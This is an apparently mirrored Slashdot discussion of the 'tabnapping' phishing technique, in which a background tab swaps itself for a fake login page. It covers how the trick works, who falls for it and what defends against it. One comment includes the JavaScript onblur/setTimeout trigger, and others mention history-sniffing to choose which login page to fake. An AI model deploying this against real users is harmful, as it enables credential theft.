Slashdot Mirror

← Back to Stories (view on slashdot.org)

Tabnapping Scams Around the Corner?

Posted by CmdrTaco on from the well-that's-not-very-nice dept.

scamdetect pointed us to an interesting bit of news about a new security risk called tabnapping that was recently outlined by Aza Raskin. The short story is that background tabs are updated with login forms impersonating the sites they originally contained, but hosted by helpful third parties primarily interested in your password. (CT:Original writeup removed at request of submitter)

39 of 362 comments (clear)

  1. Umm... by Pojut · · Score: 3, Insightful

    ...so are people really dumb enough to go "oh right, my bank's webpage" without realizing they didn't bring it up themselves?

    --
    Living With a Nerd
    1. Re:Umm... by mgblst · · Score: 5, Insightful

      What if they have it in another tab already? Then it would work.

      And if you use this for gmail, or facebook, tabs that people always have opened, it is going to get results.

      This is actually incredibly brilliant. I am going to pay more attention to my tabs from now on.

    2. Re:Umm... by Anonymous Coward · · Score: 3, Insightful

      I think what might be more disturbing is if the application looked at what url your other tabs are and redirected those sites to phishing sites that have copied the layout.

    3. Re:Umm... by commodore64_love · · Score: 2, Insightful

      Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen. And I would probably fall for it when, in about an hour, I go back to see it. I'd type in my name and password without realizing a thief was watching.

      --
      "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
    4. Re:Umm... by fuzzyfuzzyfungus · · Score: 3, Interesting

      P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."

      Arguably, that will be the case here. Your basic clueless noobtard will click on just about anything that looks vaguely plausible, and a lot of stuff that doesn't. This technique will be overkill for them, since straight phishing still works just fine.

      Your competent power user, on the other hand, may not fall for the trivial cases(two or three tabs, "innocuous-linkfarm.typosquatter.com" changes into "evil.ath.cx/yourbankherereallyhonestly.html" in front of your eyes); but they are the ones most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be totally understandable mistake, some percentage of the time, especially if you were tired, distracted, multitasking, or getting sauced enough to face a legacy refactoring project.

      Again, tab-related trickery is of no particular use against SSL and cert validation, so the clueful user could detect it that way(unless combined with some attack on SSL, the browser's implementation of it, or the integrity of a trusted certificate authority); but there is no particular reason to suspect that any but the most paranoid user would detect the tab-substitution attack itself.

    5. Re:Umm... by mcgrew · · Score: 3, Informative

      P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."

      No, that was Abraham Lincoln, who said "you can fool some of the people all of the time, and all of the people some of the time, but you can't fool all of the people all of the time."

      PT Barnum said "there's a sucker born every minute." And both he and Lincoln were correct.

      --
      Free Martian Whores!
    6. Re:Umm... by delinear · · Score: 2, Interesting

      I bank with HSBC, which is by no means a little no-name bank, and they let me log in with just typed credentials (account details and three digits of a 6-9 digit pin). I wish they'd back this up with some kind of dongle authentication, like other banks, but their answer is to have me install some rubbish plugin if I want added security, which I can't always do if I'm using different machines, working off site, etc. so I have little choice (other than the hassle of changing banks) than to accept their requirements. I have taken to using the on-screen keyboard so that I can enter with mouseclicks rather than keypresses if I'm on an untrusted machine, but other than that I can't do much else.

      It seems to me that online security is being loosened rather than tightened, in the name of providing more freedom to users (in other words just not making them jump through a couple more hoops to protect their life savings) - simple text entry, banking on mobile phones, isn't all this just asking for trouble? Ten years ago I could create one-time debit/credit card accounts with a fixed maximum or that expired after X payments or that could only be charged by client Y, etc and yet I have a hard time finding any of that from the major banks today.

    7. Re:Umm... by nabsltd · · Score: 2, Informative

      PT Barnum said "there's a sucker born every minute."

      No, he didn't.

    8. Re:Umm... by Qzukk · · Score: 2, Interesting

      user actually changed tab?

      window.onblur()

      Being somebody who got 20-30 tabs up and running along with massive tab switching I can't see how i would not spot that its forcefully reloaded and wrong?

      Do you know for certain, without looking, what is in tab #8 right this instant? If you had to look, then if you didn't read the exact URL you just lost. If you didn't have to look or you looked at the URL instead of just the title or the icon on the tab, then you would realize that tab #8 was wrong and you would be immune.

      I think the majority of people would fall for it, even if they only had three or four tabs open instead of 20-30.

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
  2. Sneaky... by fuzzyfuzzyfungus · · Score: 3, Interesting

    Obviously, this won't subvert SSL certs or anything; but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.

    And, since pages reloading themselves, or even forwarding to a different domain and URL entirely, after a delay is fairly common(if generally annoying) in a wide variety of legitimate applications, you can't really just break the ability to do that. Sure, you could add it as an advanced option somewhere, or get it largely for free with the right NoScript settings; but there is no way you can break it by default.

    You pretty much just fall back on the phishing filter, which is a lame, AV-esque "solution". This would seem to apply to all tabbed browsers, as well.

  3. This is one of those stupidly smart things. by Securityemo · · Score: 3, Informative

    You see this, and think "Why didn't someone think about this before?"

    --
    Emotions! In your brain!
    1. Re:This is one of those stupidly smart things. by supersloshy · · Score: 2, Interesting

      You see this, and think "Why didn't someone think about this before?"

      Tab Mix Plus has had locked tabs for a while now. I'm not entirely sure if this fixes the issue of tabnapping, but it looks like it might.

      --
      "Our country is not nearly so overrun with the bigoted as it is overrun with the broadminded." -Archbishop Fulton Sheen
    2. Re:This is one of those stupidly smart things. by ShadowRangerRIT · · Score: 2, Informative
      To be clear, this isn't manipulating another tab. The sequence of events is:
      1. User opens link to seemingly innocuous but malicious site in Tab 1
      2. User goes to Tab 2 to do some other work (tab 2 is immaterial to this; it would work just as well if they switched to another application long enough to forget what they were doing in the browser)
      3. Malicious site in Tab 1 detects that it is unobserved, and replaces itself with a seemingly legitimate log-in page; this need not require a refresh with appropriately designed CSS and JavaScript, so you won't even see any action in the tab bar if you happen to be looking.
      4. User returns to Tab 1, assumes he opened the log-in screen for some reason and enters user name and password

      Now, in a two tab scenario, this sequence of events in unlikely. But for a user with 30 tabs open, there is a non-negligible chance that they forget what was on tab 17, and assume they had some reason to log-in to that site. People are really good at justifying actions that make no sense; just because they don't remember opening the site doesn't mean they won't come up with a reason why they would have. If they aren't aware of this exploit and forgot what was on the tab, they'd have little reason to be suspicious.

      Basically, this isn't a Firefox specific exploit. Any tabbed browser that doesn't disable all JavaScript by default will behave this way. NoScript and similar extensions will help, but a clever website designer might design the page to be useless without JavaScript. There are enough websites like that that a sufficiently interested user might whitelist it, if only temporarily, and some small percentage of those users may succumb to the trap.

      --
      $_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
    3. Re:This is one of those stupidly smart things. by Garble+Snarky · · Score: 2, Informative

      The locking prevents the user from navigating to another page. I don't think it has any effect on scripts that were initially loaded with the page.

  4. Re:We need death squads by PhongUK · · Score: 3, Funny

    How do we identify them?

  5. disabling scripts on unfocused tabs? by roman_mir · · Score: 4, Interesting

    Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.

    But this can be done in separate windows too, not just in tabs. In terms of whether this is a new concept, let's just say that I have 'seen' this done 10 years ago to gain access to some chat accounts.

    --
    You can't handle the truth.
    1. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 2, Insightful

      white listing is not an impossible concept, or is it?

      --
      You can't handle the truth.
    2. Re:disabling scripts on unfocused tabs? by Lunix+Nutcase · · Score: 2

      Do you think that a dialog, warning a user who is switching from one screen to another with a 'allow always/never/this time/stay on this page' in case a site is running scripts on the background and then white-listing the site if the 'allow always' button is pushed is such an outrageous concept?

      Yes. That would be a huge annoyance to many users similar to all the UAC dialogs in Vista.

    3. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 2, Interesting

      sure, there is also a possibility of a delayed HTTP response to a request, a so-called server push.

      --
      You can't handle the truth.
  6. Not exactly. by khasim · · Score: 3, Informative

    Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen.

    Not exactly. From his page on this "exploit"...

    You can try it out on this very website (I've only tested it in Firefox). Click away to another tab for at least five seconds. Flip to another tab. Do whatever. Then come back to this tab.

    It's hard to find, isn't it? It looks exactly like Gmail. I was lazy and took a screenshot of Gmail which loads slowly. It would be better to recreate the page in HTML.

    So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.

    1. Re:Not exactly. by jandrese · · Score: 2, Insightful

      The idea is that these users we always hear about who never have less than 50 tabs open can't remember which tabs are which, and if you put up a Facebook login screen or something, then you'll think it's just a timed out Facebook session.

      Even before tabbed browsing was popular, you could have done this with minimized or backgrounded windows too. To me the big problem is that he has to create a site that people will feel compelled to leave open while they go off and do something else. That will probably be the most difficult part.

      --

      I read the internet for the articles.
    2. Re:Not exactly. by WrongSizeGlass · · Score: 4, Interesting

      So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.

      Exactly ... but if the 'fake' site checks your browser history for the specific fake login screens they have in their repertoire then they can show one that you have used recently.

  7. Noscript by Wonko+the+Sane · · Score: 3, Informative

    This attack only works if you allow Javascript by default, instead of only whitelisting sites that you trust.

  8. Re:So let me get this straight... by The+MAZZTer · · Score: 3, Informative

    Some people keep 100s of tabs open. They could come back hours later and see a Gmail login screen and assume they opened it at some point.

  9. Re:A little peeved! by clickety6 · · Score: 5, Insightful

    First tab-nabbing and now submission-nabbing where the link in the article changes after submission!

    --
    ----------------------------------- My Other Sig Is Hilarious -----------------------------------
  10. Re:A little peeved! by mysidia · · Score: 5, Insightful

    Slashdot is about news, not driving traffic to someone's website.

    And 'getting traffic' is not some kind of exchange or reward offered for submitting an article.

    If a different link is editorially better, then it is expected that the editors will swap it.

  11. Re:We need death squads by AndrewBC · · Score: 2, Funny

    New plan: steal my own identity sloppily under the guise of your identity which I stole perfectly. Now polish my boots!

  12. Server delayed HTTP response as a push by roman_mir · · Score: 2, Interesting

    Even if the scripts are completely disabled on the page, what about a delayed HTTP response, in effect a push to the browser by a server that is done sometime after the page is loaded as a delayed response to the browser request?

    It's really hard to avoid all possible scenarios on how a page can be changed from something to something else.

    --
    You can't handle the truth.
  13. Re:A little peeved! by Anonymous Coward · · Score: 3, Insightful

    Regardless of which link is in the story, I still greatly benefit from you having taken the time to write the blog post and submit it to slashdot. Thank you for that.

    Oh, you meant benefit to you! What do you think slashdot is? Just a way to generate eyeballs for your personal blog? Screw you for that.

  14. Re:Tabnapping by WrongSizeGlass · · Score: 2, Informative

    Changing it when you're not looking is done very easily:
    window.onblur = function(){
    ;TIMER = setTimeout(changeItUp, 5000);
    }
    BTW, this isn't just a FireFox issue, he's only tested it in FireFox. It also works in Safari and IE 7 but didn't take in Chrome 5 (Mac).

  15. Re:A little peeved! by Anonymous Coward · · Score: 2, Insightful

    I agree it was transparently disrespectful of CmdrTaco to approve your submission, but with someone elses link. However:

    1. The linked article predates your linked blog according to the submission timestamps on each blog
    2. The linked article contains further links to relevant information, including a link to the original subject's website and a proof-of-concept site.

    I understand the euphoric feeling you got when your submission was accepted, and I also understand that sinking sensation you felt when you realized your blog was not linked-to even though your submission was accepted. That being said, repackaged news is repackaged news is repackaged news and I don't think you will find much sympathy around here that your (arguably, less useful) brand of news repackaging won't be netting you ad dollars like you intended.

  16. Re:A little peeved! by mcgrew · · Score: 5, Insightful

    That's a valid reason for including the link and for being disappointed that it was replaced - isn't it?

    Not in my eyes it isn't, and I wish they'd do it more often -- like when the submission has ten ad-laden one-paragraph pages I wish they'd link to a single page view, whether that site or another. Of course you think your blog was better than krebsonsecurity, but personally I almost never click on any link with "blog" in the name, especially from slashdot. They've gotten a lot of (well deserved) flak in the past for linking a blog that links an original story, and I'm glad they're listening.

    Be glad that they didn't rewrite the entire summary as they've done with some of my submissions.

    A submission is supposed to benefit the slashdot community, not the submitter. Too often people like you make submissions just to drive traffic to their own site for the money.

    Shame on you.

    --
    Free Martian Whores!
  17. Re: Tab Mix Plus doesn't work well enough by TaoPhoenix · · Score: 2, Informative

    I tried it out and Protected/Froze/Locked the tab and the exploit ran.

    I think it's because the full contents were loaded and it didn't actually try to navigate anywhere.

    --
    My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
  18. Re:A little peeved! by Qzukk · · Score: 4, Insightful

    They've gotten a lot of (well deserved) flak in the past for linking a blog that links an original story, and I'm glad they're listening

    They're not listening, the blog post they substituted is still just someone bloviating about the original article and proof of concept.

    In action, it's scary in a way that just listening to some blogger yak about it doesn't get the point across, and the author points out how to use the :visited detectors and various hacks to detect if you've logged into a site or not to make it even scarier.

    --
    If I have been able to see further than others, it is because I bought a pair of binoculars.
  19. Re:So let me get this straight... by Qzukk · · Score: 2, Informative

    No, tab 1 is still the same site as ever, but the page you visited in tab 34 and forgot about 30 minutes ago suddenly looks like a facebook "you have timed out please log in" page. It's even used javascript to change the title of the tab and the favicon.

    Pop Quiz! Were you logged into Facebook on tab 48, tab 18, or tab 42???!?!

    All it takes is a bit of javascript inserted into a normal site using cross-site scripting, or an intentionally malicious site in the first place, or an adserver serving up whatever javascript anyone pays them to host. This is why I use NoScript.

    The original author (not linked in the submission) points out that you can use the :visited hack to choose a login screen that the user would expect to see. And you can use various other hacks to determine if the user is currently logged into some site or not.

    --
    If I have been able to see further than others, it is because I bought a pair of binoculars.
  20. Re:A little peeved! by satoshi1 · · Score: 2, Funny

    Because you're being a selfish prick.

  21. Re:A little peeved! by scamdetect · · Score: 3, Funny

    Because you're being a selfish prick.

    I truly value your input. Thank you.

  22. Re:if these geniuses by Garble+Snarky · · Score: 2, Insightful

    A legitimate purpose like, say, significant development work on a well-known, large-scale open source project, such as Firefox?

    All you had to read was the first sentence of the summary...

  23. Re:So let me get this straight... by Hurricane78 · · Score: 2, Insightful

    And it”d be their own damn fault for having such a mess.
    Seriously? You need hundreds of tabs? Did you never hear of doing first things first, and freeing your mind from other stuff? Did they never hear of bookmarks, bookmark folders and saving sessions (e.g. with TabMix Plus)?

    Sorry, but there’s a point at with you just deserve it. This is one of them. Like cockroaches in a apartment that looks like a garbage dump.

    --
    Any sufficiently advanced intelligence is indistinguishable from stupidity.